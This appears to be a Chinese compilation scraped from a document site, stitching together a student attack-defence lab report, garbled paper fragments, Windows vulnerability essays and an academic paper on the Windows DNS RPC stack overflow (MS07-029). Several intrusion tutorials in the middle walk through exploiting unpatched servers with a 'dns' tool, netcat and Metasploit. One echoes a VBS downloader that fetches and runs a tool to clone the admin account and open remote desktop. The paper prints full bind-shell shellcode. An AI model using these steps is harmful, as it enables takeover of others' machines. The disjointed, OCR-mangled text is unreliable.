WindowsDNS服务器远程栈溢出漏洞的应用研究
网络攻防实验报告

HUNAN UNIVERSITY课程实习报告题目:网络攻防学生佳学生学号201308060228专业班级 1301班指导老师钱鹏飞老师完成日期2016/1/3 完成实验总数:13具体实验:1.综合扫描2.使用 Microsoft 基线安全分析器3.DNS 溢出实验4.堆溢出实验5.配置Windows系统安全评估6.Windows 系统安全评估7.弱口令破解8.明文窃听9.网络APR攻击10.Windows_Server_IP安全配置11.Tomcat管理用户弱口令攻击12.木马灰鸽子防护13.ping扫描1.综合扫描X-scan 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SSL漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息、注册表信息等。
2.使用 Microsoft 基线安全分析器MBSA:安全基线是一个信息系统的最小安全保证, 即该信息系统最基本需要满足的安全要求。
信息系统安全往往需要在安全付出成本与所能够承受的安全风险之间进行平衡, 而安全基线正是这个平衡的合理的分界线。
不满足系统最基本的安全需求, 也就无法承受由此带来的安全风险, 而非基本安全需求的满足同样会带来超额安全成本的付出, 所以构造信息系统安全基线己经成为系统安全工程的首要步骤, 同时也是进行安全评估、解决信息系统安全性问题的先决条件。
微软基线安全分析器可对系统扫描后将生成一份检测报告,该报告将列举系统中存在的所有漏洞和弱点。
3.DNS 溢出实验DNS溢出DNS 的设计被发现可攻击的漏洞,攻击者可透过伪装 DNS 主要服务器的方式,引导使用者进入恶意网页,以钓鱼方式取得信息,或者植入恶意程序。
基于Windows下溢出漏洞扫描技术的网络渗透分析与实现

维普资讯
第1 期
王 庆等 : 于 W i o 下 溢 出漏洞 扫描技 术的 网络 渗透 分析 与 实现 基 n ws d
2 7
的各 种 漏洞 , 及时采 取 相应 的预 防措 施 。更 多 的时候 , 为 网络攻 击者 , 行 网络 渗透 时 , 要 有针 对性 对 系统 并 作 进 需 进行 扫 描 , 出特定 的漏 洞 , 找 并对 漏洞 特性 或运 行机 制进 行 分析 , 取更 进一 步 的渗透 手段 。为 了实现 这 个 目的 , 采 就必须采取一些特殊的实现方式。经过实践 , 认为基于 Wi o s n w 下溢出漏洞的扫描技术主要有以下几种实现方 d
一
。
拟对 Wi o s n w 下的溢出漏洞扫描进行研究 , d 并就 Wi 00的 P P溢出漏洞 ( 0 .3 ) n 0 2 N MS 5 9 扫描进行分析和代 0
码 实现 。
2 漏 洞 扫 描 原 理
漏洞 扫 描技 术 的原 理是 : 向远 程计 算机 的 特定 端 口发送 特定 的请 求 数 据 , 据从 该 端 口返 回数 据 的特 征 , 根 来 判 断该 主机 是 否存 在某 种漏 洞 。主要 通过 以下 两种 方法 来 检查 目标 主机 是否 存 在 漏洞 : 是 在 端 口扫 描 后得 知 一 目标主机开启的端 口以及端 口上的网络服务 , 将这些相关信息与网络漏洞扫描系统提供的漏洞库进行匹配 , 查看 是 否存 在满 足 条件 的漏 洞 ; 二是 通过模 拟 黑客 的攻 击 手法 , 目标 主 机系 统进 行 攻 击 性 的安 全 漏 洞扫 描 , 测试 对 如 弱 势 口令 等 , 模 拟攻 击成 功 , 若 则表 明 目标 主机系 统存 在安 全漏 洞 。
微软Windows操作系统漏洞案例分析

微软Windows操作系统漏洞案例分析在计算机领域中,操作系统是一种核心软件,它控制并管理计算机系统的硬件和软件资源。
然而,即使由全球领先的技术公司微软开发和维护的Windows操作系统也并非完美无缺,经常会被发现存在各种漏洞。
本文将对一些微软Windows操作系统漏洞案例进行深入分析,探讨造成这些漏洞的原因以及微软的应对措施。
漏洞一:Conficker蠕虫病毒漏洞Conficker蠕虫病毒是在2008年发现的一种针对Windows操作系统的网络蠕虫。
它利用了Windows操作系统中的漏洞进行传播,迅速感染了全球数百万台计算机。
这个漏洞的严重性在于它可以突破用户密码,获取管理员权限,并以此控制被感染计算机上的操作。
造成Conficker蠕虫病毒漏洞的原因主要有两点。
一是微软在发布Windows操作系统时未能及时识别和修复相关漏洞,导致黑客利用了这些弱点进行攻击。
二是一些用户忽视了操作系统的安全更新以及安装有效的防病毒软件等措施,为黑客入侵提供了可乘之机。
微软针对Conficker蠕虫病毒漏洞采取了多种措施进行应对。
首先,他们修复了Windows操作系统中被利用的漏洞,并提供了相应的安全更新,用户可以通过自动更新系统来获得这些修补程序。
其次,微软还加强了对恶意软件的检测和清除能力,以便用户及时发现和清除被感染的计算机。
此外,微软还积极与政府、反病毒厂商和互联网服务提供商等各方合作,共同打击Conficker蠕虫病毒的传播。
漏洞二:永恒之蓝(EternalBlue)漏洞永恒之蓝是一种利用微软Windows操作系统远程执行代码的漏洞,该漏洞于2017年被曝光。
该漏洞的严重性在于黑客可以利用它在计算机网络间迅速传播恶意软件,从而导致整个网络受到破坏。
造成永恒之蓝漏洞的原因是微软的某些操作系统版本没有及时修复相关的安全漏洞,使黑客有机可乘。
此外,该漏洞的爆发也提醒了用户重视操作系统的安全性,及时更新系统和安装补丁程序等。
教你如何DNS溢出漏洞入侵

教你如何DNS溢出漏洞入侵前提是必须要开放53、445端口1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。
2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。
3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。
connection to target host t cp port established 成功连接到主机的tcp端口上,successfully bound to the vulneraledcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口。
当出现最后这一句提示语句的时候就意味着我们要成功了。
4、怎么连接对方的1100端口呢,当然我们要使用nc了。
5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。
下面介绍一下它的几个常用功能1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听。
-vv:显示详细的信息。
-l:进行监听,监听入站信息。
-p:监听所使用的端口号。
2、正如我们遇到的情况,对方已经开放了一个端口。
他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了。
nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口。
3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端。
实验11 Windows系统缓冲区溢出漏洞利用

Windows系统缓冲区溢出漏洞利用(MS06-040)(SEC-W05-001.1)微软的Server 服务中存在一个远程执行代码漏洞,成功利用此漏洞的攻击者可以完全控制受影响的系统。
实验目的:通过本实验可以了解Windows系统漏洞所能带来的危险,以及如何针对特定的Windows 系统漏洞进行防御。
实验环境:准备一台win2000(未安装补丁文件为Windows2000-KB921883-x86-CHS.EXE,存在远程执行代码漏洞),设置其IP地址为192.168.100.100准备一台win xp电脑,设置其IP地址为192.168.100.101实验准备:首先安装MetaSploit Framework 3.1(在winxp上电脑进行安装)注:在安装过程中,请不要关闭任何弹出的窗口,否则将导致MetaSploit Framework 3.1安装完成后无法使用,必须再次重新安装才可以。
接着安装之后,进行如下操作:1.GUI界面下使用Metasploit:从开始菜单里点击"程序"->"Metasploit 3"->"Metasploit 3 GUI",界面如图1所示:图12.直接在搜索栏输入"ms06_040",返回结果"ms06_040_netapi"如图2所示:图23.双击返回结果"ms06_040_netapi",弹出目标机操作系统选择对话框,请选择"Automatic",如图3所示:图34.点击"前进",选择payload 参数"windows/shell_bind_tcp"后点击"前进"。
图45.在RHOST参数里填上目标机的IP地址(192..168.100.100),其它项按默认配置进行。
Ms07-029 远程溢出漏洞利用

Ms07-029 远程溢出漏洞利用Windows DNS RPC 接口中的漏洞可能允许远程执行代码 (935966)发布日期:五月 8, 2007 | 更新日期:六月 6, 2007本文的目标读者:使用 Microsoft Windows 的客户漏洞的影响:远程执行代码最高严重等级:严重建议:客户应立即应用此更新受影响的软件:• Microsoft Windows 2000 Server Service Pack 4 -下载此更新• Microsoft Windows Server 2003 Service Pack 1Microsoft Windows Server 2003 Service Pack 2• Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)Microsoft Windows Server 2003 SP2(用于基于 Itanium 的系统)• Microsoft Windows Server 2003 x64 EditionMicrosoft Windows Server 2003 x64 Edition Service Pack 2 不受影响的软件:• Microsoft Windows 2000 Professional Service Pack 4• Microsoft Windows XP Service Pack 2• Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Professional x64 Edition Service Pack 2 • Windows Vista• Windows Vista x64 Edition造成漏洞的原因是什么?Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出什么是远程过程调用 (RPC)?远程过程调用 (RPC) 是一种协议,程序可使用该协议向网络中另一台计算机上的程序请求服务。
计算机网络安全漏洞及解决措施分析

计算机网络安全漏洞及解决措施分析计算机网络安全一直是信息技术领域中的一个重要问题,随着网络的普及和依赖度越来越高,网络安全问题也变得愈发严峻。
在网络安全领域中,安全漏洞是一个常见的问题,它可能会导致网络系统的不稳定性,并可能造成严重的数据泄漏和其他影响。
对计算机网络安全漏洞及解决措施进行深入的分析与研究,对提高网络系统的安全性和稳定性具有重要意义。
一、计算机网络安全漏洞的种类1. 网络协议漏洞网络协议是计算机网络中非常重要的一部分,网络协议漏洞可能会导致网络系统的不稳定和信息泄露。
DNS协议漏洞可能导致恶意软件劫持用户向恶意网站进行网络查询,而BGP协议漏洞则可能导致网络路由错误。
2. 操作系统漏洞操作系统是计算机网络的基础设施,操作系统漏洞可能导致黑客入侵和数据泄露。
Windows、Linux、Mac OS等操作系统在历史上都曾被发现过多个漏洞,一旦被黑客攻击,可能对网络系统造成严重的破坏。
3. 应用程序漏洞各种各样的应用程序都存在着安全漏洞,这些漏洞可能会被黑客利用来入侵网络系统。
常见的应用程序漏洞包括Web应用程序漏洞、数据库漏洞等,这些漏洞一旦被黑客攻击可能导致信息泄露和数据损坏。
4. 数据库漏洞数据库是网络系统中储存重要数据的地方,数据库漏洞可能会导致重要数据泄露或被篡改。
例如SQL注入漏洞、未授权访问漏洞等,这些漏洞可能会被黑客用来获取系统的敏感信息。
以上只是一部分计算机网络安全漏洞的种类,事实上,安全漏洞的种类非常多,它们可能会对网络系统的安全性和稳定性造成严重影响。
对于安全漏洞的解决措施也显得非常重要。
1. 加强网络安全意识作为网络系统的管理者和用户,加强网络安全意识是非常重要的。
只有提高对网络安全的认识,才能更好地防范网络安全漏洞。
管理者应该加强员工的网络安全培训,而用户应该提高对邮件、网站等网络环境的警惕性,不轻易点击疑似的钓鱼邮件或者恶意网站。
2. 及时更新补丁针对操作系统和应用程序漏洞,及时更新补丁是防范安全漏洞的重要手段。
黑客体验:MS07-029漏洞利用入侵过程

前言:MS07-029,Windows 域名系统(DNS) 服务器服务的远程过程调用(RPC) 管理接口中存在基于堆栈的缓冲区溢出。
漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!先用它来对主机进行扫描:在我们的命令行下输入:“dns –s 目标IP地址”稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:在命令行内输入dns -2003chs *.*.93.189 1029其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,10 29就是刚才扫描出存在漏洞的端口”。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,在命令行里输入@echo with wscript:if .arguments.count^ tony.vbs@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs然后把开3389的工具上传到你的个人空间,我这里用的是火狐开3389的工具,在命令行里输入cscript tony.vbs http://你空间地址/wrsky.exe c:wrsky.exe“wrsky.exe -c”可以克隆当前管理员帐号再输入“c:wrsky.exe -o 3551”意思就是打开对方的远程桌面服务,并且使用3551端口。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
信息安全与通信保密・2008.10学术研究Academic Research75收稿日期:2008-03-17作者简介:汤蕾,1983年生,上海交通大学电子工程系研究生,研究方向:通信与信息系统。
汤蕾,薛质(上海交通大学电子信息与电气工程学院电子工程系,上海 200240)【摘 要】文章介绍了系统安全漏洞和针对系统安全漏洞攻击的基本实现原理,通过对具体漏洞的分析,提出了Windows系统中基于DNS服务远程栈缓冲区溢出攻击的具体实现方法,同时也给出了针对系统安全漏洞的一些防御和避免措施。
【关键词】DNS服务;寄存器;堆栈;缓冲区溢出【中图分类号】TP393.08 【文献标识码】A 【文章编号】1009-8054(2008) 10-0075-02Analysis of Stack Overflows on Windows DNS ServerTang Lei, Xue Zhi(Department of Electronic and Information Engineering, Shanghai Jiao Tong University, Shanghai 200240, China)【Abstract 】The paper describes the development of the current system security leak and provides the fundamental concepts. Through the analysis of a specific leak, the paper provides an implement of an attack on Windows system, exploit-ing the stack overflow, at the same time, it also provides some means to avoid such attacks based on system security leaks.【Keywords 】DNS service; Register; Stack; Buffer OverflowWindows DNS 服务器远程栈溢出漏洞的应用研究0 引言系统安全漏洞是在系统软件、协议的具体实现或是系统安全策略上存在缺陷,没有考虑一些特殊的异常处理,导致攻击者能够在未经授权的情况下以特定的权限访问甚至是破坏系统资源,包括操作系统及支撑软件、路由器、防火墙等。
但是漏洞的存在具有实效性,系统漏洞会随时间的推移逐渐暴露出来,相应的补丁软件也会不断地更新推出。
在原有漏洞得到纠正的同时,一些新的漏洞和错误也会被引入。
因此,漏洞问题将会长期存在,对漏洞问题的研究必须跟踪最新的系统漏洞,分析其安全问题的最新发展动态。
缓冲区溢出漏洞是系统安全中一个比较常见的漏洞,攻击者所使用的攻击方法虽然针对特定的漏洞有所不同,但是攻击的原理都是一样的,即利用堆栈和系统调用的特性,构造特定的、超过正常长度的数据包,造成缓冲区溢出,破坏程序正常的堆栈,使程序转而执行其他的指令,达到攻击的目的。
因此,对堆栈和系统调用的特性的掌握,对于攻击者来说至关重要,目前比较常用的两种攻击方法的比较如表1所示[1]。
1 缓冲区溢出漏洞实例分析缓冲区溢出漏洞有很多,漏洞原理基本一致,MS07029是其中比较典型的一个,下面就这个具体漏洞的成因和利用方法加以介绍。
Windows DNS服务器的RPC接口在处理畸形请求时存在栈溢出漏洞。
该漏洞出现在RPC监听端口代码段,该端口是为DNS服务器管理所用,在DNS服务主线程监听端口53的编码上没有出现问题。
Name_ConvertFileName ToCountName()函数使用固定的本地缓冲区转换Lookup_ZoneTreeNodeFromDottedName()字符串,尽管在写入缓冲区时进行了一些边界检查,但对于Name_ConvertFileNameToCountName()表1 Unix方式和系统指令方式的比较Academic Research学术研究76函数中的局部变量presult却未加限制,导致了栈溢出。
攻击者向有漏洞的系统发送特制的RPC报文可以触发这个溢出,导致以权限Local SYSTEM执行任意指令。
在MS07029漏洞利用工具代码中,探测目标系统版本是通过调用int fingerprint(char *host)这个函数来实现的,int fingerprint(char *host)函数通过向目标IP发送特定的报文,根据目标主机的响应来判断系统类型。
在掌握版本信息后,攻击者就可以采用“利用系统指令方式”的方法构造返回地址了。
之后,攻击者需要知道目标系统RPC端口信息。
在代码中,通过对函数char *DiscoverPort(char *host,char *uid)的调用,攻击者可以知道哪个RPC端口是可以被攻击的。
在完成前两步后,攻击者就需要精心构造溢出字符串了。
漏洞利用工具采用的是“利用系统指令方式”构造溢出字符串。
在函数DnssrvQuery(parama、paramb、paramc、paramd、parame)中,通过构造特定的参数paramb达到溢出的目的。
paramb的形式如图1所示。
当函数DnssrvQuery接收到参数paramb后,返回地址被覆盖成系统jmp esp指令地址,执行完jmp esp后,程序跳转到shellcode处执行,达到溢出攻击的目的。
Shellcode可以设计成打开系统一个端口提供远程登陆,也可以设计成自动从特定地址下载执行文件。
本工具中的shellcode采用打开系统一个端口提供远程登陆的设计方法,具体代码如下:unsigned char shellcode2k[] ="\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x18\xc3\x99\x10\x83\xee\xfc\xe2\xf4\xe4\xa9\x72\x5d\xf0\x3a\x66\xef\xe7\xa3\x12\x7c\x3c\xe7\x12\x55\x24\x48\xe5\x15\x60\xc2\x76\x9b\x57\xdb\x12\x4f\x38\xc2\x72\x59\x93\xf7\x12\x11\xf6\xf2\x59\x89\xb4\x47\x59\x64\x1f\x02\x53\x1d\x19\x01\x72\xe4\x23\x97\xbd\x38\x6d\x26\x12\x4f\x3c\xc2\x72\x76\x93\xcf\xd2\x9b\x47\xdf\x98\xfb\x1b\xef\x12\x99\x74\xe7\x85\x71\xdb\xf2\x42\x74\x93\x80\xa9\x9b\x58\xcf\x12\x60\x04\x6e\x12\x50\x10\x9d\xf1\x9e\x56\xcd\x75\x40\xe7\x15\xff\x43\x7e\xab\xaa\x22\x70\xb4\xea\x22\x47\x97\x66\xc0\x70\x08\x74\xec\x23\x93\x66\xc6\x47\x4a\x7c\x76\x99\x2e\x91\x12\x4d\xa9\x9b\xef\xc8\xab\x40\x19\xed\x6e\xce\xef\xce\x90\xca\x43\x4b\x90\xda\x43\x5b\x90\x66\xc0\x7e\xab\x88\x4c\x7e\x90\x10\xf1\x8d\xab\x3d\x0a\x68\x04\xce\xef\xce\xa9\x89\x41\x4d\x3c\x49\x78\xbc\x6e\xb7\xf9\x4f\x3c\x4f\x43\x4d\x3c\x49\x78\xfd\x8a\x1f\x59\x4f\x3c\x4f\x40\x4c\x97\xcc\xef\xc8\x50\xf1\xf7\x61\x05\xe0\x47\xe7\x15\xcc\xef\xc8\xa5\xf3\x74\x7e\xab\xfa\x7d\x91\x26\xf3\x40\x41\xea\x55\x99\xff\xa9\xdd\x99\xfa\xf2\x59\xe3\xb2\x3d\xdb\x3d\xe6\x81\xb5\x83\x95\xb9\xa1\xbb\xb3\x68\xf1\x62\xe6\x70\x8f\xef\x6d\x87\x66\xc6\x43\x94\xcb\x41\x49\x92\xf3\x11\x49\x92\xcc\x41\xe7\x13\xf1\xbd\xc1\xc6\x57\x43\xe7\x15\xf3\xef\xe7\xf4\x66\xc0\x93\x94\x65\x93\xdc\xa7\x66\xc6\x4a\x3c\x49\x78\xe8\x49\x9d\x4f\x4b\x3c\x4f\xef\xc8\xc3\x99\x10"目前,针对这一漏洞的系统补丁可以从微软官方网站上下载,微软对该漏洞的评级为“严重级”,所以任何使用Microsoft Windows Server 2003 SP2、Microsoft WindowsServer 2003 SP1、Microsoft Windows Server 2000 SP4系统的服务器都需尽快安装补丁,以免受到针对该漏洞的攻击。
2 缓冲区溢出漏洞的防御目前防止出现缓冲区溢出漏洞的解决办法,基本上有以下几:严格对代码进行强类型和长度检查;使缓冲区不可执行;使堆栈向高地址方向增长;使静态数据段中的函数地址指针存放地址和其他数据的存放地址分离。
对于一般的系统使用者而言,常升级系统和使用补丁程序是一个非常好的防范缓冲区溢出攻击和其他攻击的有效途径。
3 结语缓冲区溢出攻击是系统安全漏洞当中比较显著地一种利用方式,攻击者利用它可以完全操作一个系统,比其他任何攻击方式更具有危险性。
但是如果能够注意本文提出地一些防御和避免措施,就可以很大程度上减少被攻击地可能性了。
参考文献[1] 朱明,尹大成,陈亿霖. 缓冲区溢出攻击及检测方法研究[J]. 计算机工程,2002,28(7):151-153.[2] 阙喜戎,赵耀,王纯. Windows系统中基于缓冲区溢出攻击的分析[J]. 计算机应用,2004,22(1):32-34. 图1 构造paramb参数。